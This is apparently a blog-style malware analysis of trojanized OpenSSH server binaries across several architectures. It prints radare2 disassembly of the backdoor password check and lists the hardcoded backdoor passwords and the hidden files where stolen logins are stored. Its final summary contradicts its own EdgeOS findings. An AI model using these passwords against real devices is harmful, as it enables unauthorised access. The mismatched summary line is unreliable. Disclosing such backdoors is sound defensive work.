This is a short post to add some additional information to previous post.
The default backdoor password that I analysed from the trojanized OpenSSH source code (PRtestD) is different depending on the OS and the architecture. Also, I figured out that the file where all the 'sniffed' password are kept (default is /etc/X11/.pr) is different as well.
As mentioned in my previous post there are 7 different trojanized packages for several OS / architectures:
- armv6 (ARMv6):
- armv71(ARMv7):
- Vyos (x86):
- Vyos64 (x64):
- edgeos (MIPS):
- edgeos64 (MIPS 64bits):
- default (compile on demand):
All the packages (except the default) contains OpenSSH compiled binaries and I assumed the password was the same in all of them, but this is not the case. Let's take a look.
Using 'radare2' I disassembled the 'sym.auth_password' function (where the backdoor password is located) across the different SSHD binaries.
This is the code:
; UNKNOWN XREF from 0x000ff39c (unk)
│ 0x00011100 684b ldr r3, [pc, 0x1a0] ; [0x112a4:4]=0x61260 obj.SECRETPW
│ 0x00011102 2f22 movs r2, 0x2f ; '/'
│ 0x00011104 d6f80080 ldr.w r8, [r6]
│ 0x00011108 4ff0650e mov.w lr, 0x65 ; 'e'
│ 0x0001110c d4f80ca0 ldr.w sl, [r4, 0xc]
│ 0x00011110 4ff0310c mov.w ip, 0x31 ; '1'
│ 0x00011114 9f70 strb r7, [r3, 2]
│ ; UNKNOWN XREF from 0x0000ca44 (unk)
│ 0x00011116 0846 mov r0, r1
│ 0x00011118 5f71 strb r7, [r3, 5]
│ 0x0001111a 0d46 mov r5, r1
│ ; UNKNOWN XREF from 0x000aefe8 (unk)
│ 0x0001111c cdf81480 str.w r8, [sp + local_14h]
│ 0x00011120 1946 mov r1, r3
│ 0x00011122 83f803e0 strb.w lr, [r3, 3]
│ 0x00011126 4ff05008 mov.w r8, 0x50 ; 'P'
│ 0x0001112a 89f80270 strb.w r7, [sb, 2]
│ 0x0001112e 83f80080 strb.w r8, [r3]
│ 0x00011132 4ff05208 mov.w r8, 0x52 ; 'R'
│ 0x00011136 89f80820 strb.w r2, [sb, 8]
│ 0x0001113a 83f80180 strb.w r8, [r3, 1]
│ 0x0001113e 4ff07308 mov.w r8, 0x73 ; 's'
│ 0x00011142 89f807c0 strb.w ip, [sb, 7]
│ 0x00011146 83f80480 strb.w r8, [r3, 4]
│ 0x0001114a 4ff03008 mov.w r8, 0x30 ; '0'
│ 0x0001114e 89f80020 strb.w r2, [sb]
│ 0x00011152 83f80680 strb.w r8, [r3, 6]
│ 0x00011156 7023 movs r3, 0x70 ; 'p'
Following the assembly code, I can see the password is: PRtest0

; XREFS: CALL 0x0002566c
│ 0x00012358 f04f2de9 push {r4, r5, r6, r7, r8, sb, sl, fp, lr}
│ 0x0001235c 1cd04de2 sub sp, sp, 0x1c
│ 0x00012360 60829fe5 ldr r8, [pc, 0x260] ; [0x125c8:4]=0x74d78 obj.__stack_chk_guard__GLIBC_2.4 LEA loc._d_135 ; "xM." @ 0x125c8
│ 0x00012364 60329fe5 ldr r3, [pc, 0x260] ; [0x125cc:4]=0x79268 obj.SECRETPW
│ 0x00012368 60629fe5 ldr r6, [pc, 0x260] ; [0x125d0:4]=0x79318 obj.ILOG
│ 0x0001236c 00a098e5 ldr sl, [r8]
│ 0x00012370 0040a0e1 mov r4, r0
│ 0x00012374 14a08de5 str sl, [sp + local_14h]
│ 0x00012378 50a0a0e3 mov sl, 0x50 ; 'P'
│ 0x0001237c 00a0c3e5 strb sl, [r3]
│ 0x00012380 52a0a0e3 mov sl, 0x52 ; 'R'
│ 0x00012384 01a0c3e5 strb sl, [r3, 1]
│ 0x00012388 73a0a0e3 mov sl, 0x73 ; 's'
│ 0x0001238c 74c0a0e3 mov ip, 0x74 ; 't'
│ 0x00012390 65e0a0e3 mov lr, 0x65 ; 'e'
│ 0x00012394 04a0c3e5 strb sl, [r3, 4]
│ 0x00012398 30a0a0e3 mov sl, 0x30 ; '0'
│ 0x0001239c 0c9094e5 ldr sb, [r4, 0xc]
│ 0x000123a0 0100a0e1 mov r0, r1
│ 0x000123a4 06a0c3e5 strb sl, [r3, 6]
│ 0x000123a8 02c0c3e5 strb ip, [r3, 2]
│ 0x000123ac 03e0c3e5 strb lr, [r3, 3]
│ 0x000123b0 05c0c3e5 strb ip, [r3, 5]
│ 0x000123b4 0150a0e1 mov r5, r1
│ 0x000123b8 0310a0e1 mov r1, r3
│ 0x000123bc 7030a0e3 mov r3, 0x70 ; 'p'
│ 0x000123c0 0a30c6e5 strb r3, [r6, 0xa]
│ 0x000123c4 6330a0e3 mov r3, 0x63 ; 'c'
│ 0x000123c8 0330c6e5 strb r3, [r6, 3]
│ 0x000123cc 5830a0e3 mov r3, 0x58 ; 'X'
│ 0x000123d0 0530c6e5 strb r3, [r6, 5]
│ 0x000123d4 0030a0e3 mov r3, 0
│ 0x000123d8 0c30c6e5 strb r3, [r6, 0xc]
│ 0x000123dc 2e30a0e3 mov r3, 0x2e ; '.'
│ 0x000123e0 2f20a0e3 mov r2, 0x2f ; section_end..ARM.attributes
│ 0x000123e4 3170a0e3 mov r7, 0x31 ; '1'
│ 0x000123e8 0930c6e5 strb r3, [r6, 9]
│ 0x000123ec 7230a0e3 mov r3, 0x72 ; 'r'
│ 0x000123f0 0820c6e5 strb r2, [r6, 8]
│ 0x000123f4 0770c6e5 strb r7, [r6, 7]
│ 0x000123f8 0020c6e5 strb r2, [r6]
│ 0x000123fc 0670c6e5 strb r7, [r6, 6]
The password is the same than for ARMv6: PRtest0
; CALL XREF from 0x080664dc (sym.mm_answer_authpassword)
│ 0x08051f60 83ec5c sub esp, 0x5c
│ 0x08051f63 895c244c mov dword [esp + local_4ch], ebx
│ 0x08051f67 8b5c2460 mov ebx, dword [esp + local_60h] ; [0x60:4]=0x8048134 section.INTERP ; '`' ; "4...."
│ 0x08051f6b 89742450 mov dword [esp + local_50h], esi
│ 0x08051f6f 8b742464 mov esi, dword [esp + local_64h] ; [0x64:4]=19 ; 'd'
│ 0x08051f73 897c2454 mov dword [esp + local_54h], edi
│ 0x08051f77 896c2458 mov dword [esp + local_58h], ebp
│ 0x08051f7b 8b7b0c mov edi, dword [ebx + 0xc] ; [0xc:4]=0
│ 0x08051f7e 8b6b28 mov ebp, dword [ebx + 0x28] ; [0x28:4]=0x200034 ; '(' ; "4"
│ 0x08051f81 c7442404d0c1. mov dword [esp + local_4h], obj.SECRETPW ; [0x80bc1d0:4]=0x1930100 LEA obj.SECRETPW ; obj.SECRETPW
│ 0x08051f89 893424 mov dword [esp], esi
│ 0x08051f8c 65a114000000 mov eax, dword gs:[0x14] ; [0x14:4]=1
│ 0x08051f92 8944243c mov dword [esp + local_3ch], eax
│ 0x08051f96 31c0 xor eax, eax
│ 0x08051f98 c605d0c10b08. mov byte [obj.SECRETPW], 0x47 ; [0x80bc1d0:1]=0 LEA obj.SECRETPW ; obj.SECRETPW
│ 0x08051f9f c605d1c10b08. mov byte [0x80bc1d1], 0x5a ; [0x80bc1d1:1]=1
│ 0x08051fa6 c605d2c10b08. mov byte [0x80bc1d2], 0x6d ; [0x80bc1d2:1]=147
│ 0x08051fad c605d3c10b08. mov byte [0x80bc1d3], 0x37 ; [0x80bc1d3:1]=1
│ 0x08051fb4 c605d4c10b08. mov byte [0x80bc1d4], 0x48 ; [0x80bc1d4:1]=116
│ 0x08051fbb c605d5c10b08. mov byte [0x80bc1d5], 0x46 ; [0x80bc1d5:1]=0
│ 0x08051fc2 c605d6c10b08. mov byte [0x80bc1d6], 0 ; [0x80bc1d6:1]=0
│ 0x08051fc9 c605a7c20b08. mov byte [0x80bc2a7], 0x70 ; [0x80bc2a7:1]=2
│ 0x08051fd0 c605a0c20b08. mov byte [0x80bc2a0], 0x63 ; [0x80bc2a0:1]=36
│ 0x08051fd7 c605a5c20b08. mov byte [0x80bc2a5], 0x2f ; [0x80bc2a5:1]=1
│ 0x08051fde c605a4c20b08. mov byte [0x80bc2a4], 0x73 ; [0x80bc2a4:1]=0
│ 0x08051fe5 c6059dc20b08. mov byte [obj.ILOG], 0x2f ; [0x80bc29d:1]=58 LEA obj.ILOG ; ":" @ 0x80bc29d
│ 0x08051fec c605a3c20b08. mov byte [0x80bc2a3], 0x70 ; [0x80bc2a3:1]=0
│ 0x08051ff3 c6059ec20b08. mov byte [0x80bc29e], 0x65 ; [0x80bc29e:1]=0
│ 0x08051ffa c605a2c20b08. mov byte [0x80bc2a2], 0x6c ; [0x80bc2a2:1]=29
│ 0x08052001 c6059fc20b08. mov byte [0x80bc29f], 0x74 ; [0x80bc29f:1]=0
│ 0x08052008 c605a9c20b08. mov byte [0x80bc2a9], 0 ; [0x80bc2a9:1]=1
│ 0x0805200f c605a1c20b08. mov byte [0x80bc2a1], 0x2f ; [0x80bc2a1:1]=8
│ 0x08052016 c605a6c20b08. mov byte [0x80bc2a6], 0x6c ; [0x80bc2a6:1]=75
│ 0x0805201d c605a8c20b08. mov byte [0x80bc2a8], 0x73 ; [0x80bc2a8:1]=1
│ 0x08052024 e8e7b3ffff call sym.imp.strcmp
│ 0x08052029 85c0 test eax, eax
│ ┌─< 0x0805202b 7533 jne 0x8052060
│ │ 0x0805202d c70594900b08. mov dword [obj.secret_ok], 1 ; [0x80b9094:4]=0x841c60d LEA obj.secret_ok ; obj.secret_ok
│ │ 0x08052037 b001 mov al, 1
│ │ ; JMP XREF from 0x0805213b (sym.auth_password)
│ │ ; JMP XREF from 0x08052112 (sym.auth_password)
│ ┌┌──> 0x08052039 8b54243c mov edx, dword [esp + local_3ch] ; [0x3c:4]=0x8048034 section_end.ehdr ; '<' ; "4...4..."
│ │││ 0x0805203d 653315140000. xor edx, dword gs:[0x14]
│ ┌────< 0x08052044 0f8576010000 jne 0x80521c0
│ ││││ 0x0805204a 8b5c244c mov ebx, dword [esp + local_4ch] ; [0x4c:4]=5 ; 'L'
│ ││││ 0x0805204e 8b742450 mov esi, dword [esp + local_50h] ; [0x50:4]=4 ; 'P'
│ ││││ 0x08052052 8b7c2454 mov edi, dword [esp + local_54h] ; [0x54:4]=3 ; 'T'
│ ││││ 0x08052056 8b6c2458 mov ebp, dword [esp + local_58h] ; [0x58:4]=308 ; 'X' ; "4."
│ ││││ 0x0805205a 83c45c add esp, 0x5c
│ ││││ 0x0805205d c3 ret
││││ 0x0805205e 6690 nop
In this case the password is GZm7HF, but also the file is different '/etc/lps/lps'
Python 2.7.12 (default, Jun 29 2016, 14:05:02)
[GCC 4.2.1 Compatible Apple LLVM 7.3.0 (clang-703.0.31)] on darwin
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>>> "475a6d374846".decode("hex")
>>> "2f6574632f6c70732f6c7073".decode("hex")

0x0040ba00 48896c24e0 mov qword [rsp - 0x20], rbp
│ 0x0040ba05 4889f5 mov rbp, rsi
│ 0x0040ba08 48895c24d8 mov qword [rsp - 0x28], rbx
│ 0x0040ba0d 4c896424e8 mov qword [rsp - 0x18], r12
│ 0x0040ba12 4c896c24f0 mov qword [rsp - 0x10], r13
│ 0x0040ba17 4889fb mov rbx, rdi
│ 0x0040ba1a 4c897424f8 mov qword [rsp - 8], r14
│ 0x0040ba1f be108b6700 mov esi, obj.SECRETPW ; obj.SECRETPW
│ 0x0040ba24 4883ec38 sub rsp, 0x38
│ 0x0040ba28 448b670c mov r12d, dword [rdi + 0xc] ; [0xc:4]=0
│ 0x0040ba2c 4c8b6f30 mov r13, qword [rdi + 0x30] ; [0x30:8]=0x38004000000000 ; '0'
│ 0x0040ba30 4889ef mov rdi, rbp
│ 0x0040ba33 64488b042528. mov rax, qword fs:[0x28] ; [0x28:8]=0x200470 ; '('
│ 0x0040ba3c 4889442408 mov qword [rsp + local_8h], rax
│ 0x0040ba41 31c0 xor eax, eax
│ 0x0040ba43 c605c6d02600. mov byte [rip + 0x26d0c6], 0x47 ; [0x678b10:1]=178 LEA obj.SECRETPW ; obj.SECRETPW
│ 0x0040ba4a c605c0d02600. mov byte [rip + 0x26d0c0], 0x5a ; [0x678b11:1]=122
│ 0x0040ba51 c605bad02600. mov byte [rip + 0x26d0ba], 0x6d ; [0x678b12:1]=64
│ 0x0040ba58 c605b4d02600. mov byte [rip + 0x26d0b4], 0x37 ; [0x678b13:1]=0
│ 0x0040ba5f c605aed02600. mov byte [rip + 0x26d0ae], 0x48 ; [0x678b14:1]=0
│ 0x0040ba66 c605a8d02600. mov byte [rip + 0x26d0a8], 0x46 ; [0x678b15:1]=0
│ 0x0040ba6d c605a2d02600. mov byte [rip + 0x26d0a2], 0 ; [0x678b16:1]=0
│ 0x0040ba74 c60574d12600. mov byte [rip + 0x26d174], 0x70 ; [0x678bef:1]=0
│ 0x0040ba7b c60566d12600. mov byte [rip + 0x26d166], 0x63 ; [0x678be8:1]=165
│ 0x0040ba82 c60564d12600. mov byte [rip + 0x26d164], 0x2f ; [0x678bed:1]=102
│ 0x0040ba89 c6055cd12600. mov byte [rip + 0x26d15c], 0x73 ; [0x678bec:1]=10
│ 0x0040ba90 c6054ed12600. mov byte [rip + 0x26d14e], 0x2f ; [0x678be5:1]=0 LEA obj.ILOG ; obj.ILOG
│ 0x0040ba97 c6054dd12600. mov byte [rip + 0x26d14d], 0x70 ; [0x678beb:1]=0
│ 0x0040ba9e c60541d12600. mov byte [rip + 0x26d141], 0x65 ; [0x678be6:1]=0
│ 0x0040baa5 c6053ed12600. mov byte [rip + 0x26d13e], 0x6c ; [0x678bea:1]=0
│ 0x0040baac c60534d12600. mov byte [rip + 0x26d134], 0x74 ; [0x678be7:1]=0
│ 0x0040bab3 c60537d12600. mov byte [rip + 0x26d137], 0 ; [0x678bf1:1]=1
│ 0x0040baba c60528d12600. mov byte [rip + 0x26d128], 0x2f ; [0x678be9:1]=124
│ 0x0040bac1 c60526d12600. mov byte [rip + 0x26d126], 0x6c ; [0x678bee:1]=0
│ 0x0040bac8 c60521d12600. mov byte [rip + 0x26d121], 0x73 ; [0x678bf0:1]=54
│ 0x0040bacf e86cb4ffff call sym.imp.strcmp
│ 0x0040bad4 85c0 test eax, eax
│ ┌─< 0x0040bad6 7548 jne 0x40bb20
│ │ 0x0040bad8 c70586722600. mov dword [rip + 0x267286], 1 ; [0x672d68:4]=0x784 LEA obj.secret_ok ; obj.secret_ok
│ │ 0x0040bae2 b001 mov al, 1
│ │ ; JMP XREF from 0x0040bbec (sym.userauth_none)
│ │ ; JMP XREF from 0x0040bbc5 (sym.userauth_none)
│ ┌┌──> 0x0040bae4 488b542408 mov rdx, qword [rsp + local_8h] ; [0x8:8]=0
│ │││ 0x0040bae9 644833142528. xor rdx, qword fs:[0x28]
│ ┌────< 0x0040baf2 0f8578010000 jne 0x40bc70
│ ││││ 0x0040baf8 488b5c2410 mov rbx, qword [rsp + local_10h] ; [0x10:8]=0x1003e0002
│ ││││ 0x0040bafd 488b6c2418 mov rbp, qword [rsp + local_18h] ; [0x18:8]=0x40a234 sym._start
│ ││││ 0x0040bb02 4c8b642420 mov r12, qword [rsp + local_20h] ; [0x20:8]=64 ; "@" 0x00000020
│ ││││ 0x0040bb07 4c8b6c2428 mov r13, qword [rsp + local_28h] ; [0x28:8]=0x200470 ; '('
│ ││││ 0x0040bb0c 4c8b742430 mov r14, qword [rsp + local_30h] ; [0x30:8]=0x38004000000000 ; '0'
│ ││││ 0x0040bb11 4883c438 add rsp, 0x38
In this case the password is GZm7HF also. The file is '/etc/lps/lps' as well
edgeos (MIPS)

│││ ; XREFS: CALL 0x0040b7fc CALL 0x00425314 CALL 0x0040bacc CALL 0x004249ec CALL 0x00424c24 CALL 0x00425030
│ ││││ ; XREFS: CALL 0x0040ba10 CALL 0x0040b9e0 CALL 0x0040baac CALL 0x0041eb28
│ ────────> 0x0040a224 b0ffbd27 addiu sp, sp, -0x50
│ ││││ 0x0040a228 3800b2af sw s2, 0x38(sp)
│ ││││ 0x0040a22c 4800123c lui s2, 0x48
│ ││││ 0x0040a230 00a04b8e lw t3, -0x6000(s2)
│ ││││ 0x0040a234 48000a3c lui t2, 0x48
│ ││││ 0x0040a238 2c00abaf sw t3, 0x2c(sp)
│ ││││ 0x0040a23c 47000b24 addiu t3, zero, 0x47
│ ││││ 0x0040a240 b89f4225 addiu v0, t2, -0x6048
│ ││││ 0x0040a244 b89f4ba1 sb t3, -0x6048(t2)
│ ││││ 0x0040a248 5a000a24 addiu t2, zero, 0x5a
│ ││││ 0x0040a24c 4800b6af sw s6, 0x48(sp)
│ ││││ 0x0040a250 3c00b3af sw s3, 0x3c(sp)
│ ││││ 0x0040a254 3400b1af sw s1, 0x34(sp)
│ ││││ 0x0040a258 3000b0af sw s0, 0x30(sp)
│ ││││ 0x0040a25c 4c00bfaf sw ra, 0x4c(sp)
│ ││││ 0x0040a260 4400b5af sw s5, 0x44(sp)
│ ││││ 0x0040a264 4000b4af sw s4, 0x40(sp)
│ ││││ 0x0040a268 01004aa0 sb t2, 1(v0)
│ ││││ 0x0040a26c 6d000a24 addiu t2, zero, 0x6d
│ ││││ 0x0040a270 02004aa0 sb t2, 2(v0)
│ ││││ 0x0040a274 37000a24 addiu t2, zero, 0x37
│ ││││ 0x0040a278 03004aa0 sb t2, 3(v0)
│ ││││ 0x0040a27c 48000a24 addiu t2, zero, 0x48
│ ││││ 0x0040a280 4800093c lui t1, 0x48
│ ││││ 0x0040a284 21808000 move s0, a0
│ ││││ 0x0040a288 04004aa0 sb t2, 4(v0)
│ ││││ 0x0040a28c 46000a24 addiu t2, zero, 0x46
│ ││││ 0x0040a290 0c00148e lw s4, 0xc(s0)
│ ││││ 0x0040a294 48e83625 addiu s6, t1, -0x17b8
│ ││││ 0x0040a298 2120a000 move a0, a1
│ ││││ 0x0040a29c 05004aa0 sb t2, 5(v0)
│ ││││ 0x0040a2a0 060040a0 sb zero, 6(v0)
│ ││││ 0x0040a2a4 2188a000 move s1, a1
│ ││││ 0x0040a2a8 21284000 move a1, v0
│ ││││ 0x0040a2ac 63000224 addiu v0, zero, 0x63
│ ││││ 0x0040a2b0 0300c2a2 sb v0, 3(s6)
│ ││││ 0x0040a2b4 65000224 addiu v0, zero, 0x65
│ ││││ 0x0040a2b8 2f000324 addiu v1, zero, 0x2f
│ ││││ 0x0040a2bc 70000824 addiu t0, zero, 0x70
│ ││││ 0x0040a2c0 73000624 addiu a2, zero, 0x73
│ ││││ 0x0040a2c4 6c000724 addiu a3, zero, 0x6c
│ ││││ 0x0040a2c8 0100c2a2 sb v0, 1(s6)
│ ││││ 0x0040a2cc 74000224 addiu v0, zero, 0x74
│ ││││ 0x0040a2d0 0a00c8a2 sb t0, 0xa(s6)
│ ││││ 0x0040a2d4 0800c3a2 sb v1, 8(s6)
│ ││││ 0x0040a2d8 0700c6a2 sb a2, 7(s6)
│ ││││ 0x0040a2dc 0600c8a2 sb t0, 6(s6)
│ ││││ 0x0040a2e0 0500c7a2 sb a3, 5(s6)
│ ││││ 0x0040a2e4 0200c2a2 sb v0, 2(s6)
│ ││││ 0x0040a2e8 0c00c0a2 sb zero, 0xc(s6)
│ ││││ 0x0040a2ec 0400c3a2 sb v1, 4(s6)
│ ││││ 0x0040a2f0 0900c7a2 sb a3, 9(s6)
│ ││││ 0x0040a2f4 0b00c6a2 sb a2, 0xb(s6)
│ ││││ 0x0040a2f8 5015100c jal fcn.00405540
│ ││││ 0x0040a2fc 48e823a1 sb v1, -0x17b8(t1)
│ ────────< 0x0040a300 12004014 bnez v0, 0x40a34c
│ ││││ 0x0040a304 2800138e lw s3, 0x28(s0)
│ ││││ 0x0040a308 4800023c lui v0, 0x48
│ ││││ 0x0040a30c 01000324 addiu v1, zero, 1
│ ││││ 0x0040a310 ac9f43ac sw v1, -0x6054(v0)
│ ││││ 0x0040a314 01000224 addiu v0, zero, 1
The password and the file is the same than with Vyos/64
edgeos64 (MIPS)
Radare doesn't seem to work with this MIPS 64 file.
As a summary, the backdoor passwords are:
ARMv7 / ARMv6 = PRtest0
Vyos / Vyos64 = GZm7HF
Default = PRtestD
edgeos = PRtest0
edgeos64 = ??????
The files with the sniffed accounts are:
ARMv7 / ARMv6 = /etc/X11/.pr
Vyos / Vyos64 = '/etc/lps/lps'
Default = /etc/X11/.pr
edgeos = '/etc/lps/lps'
edgeos64 = ???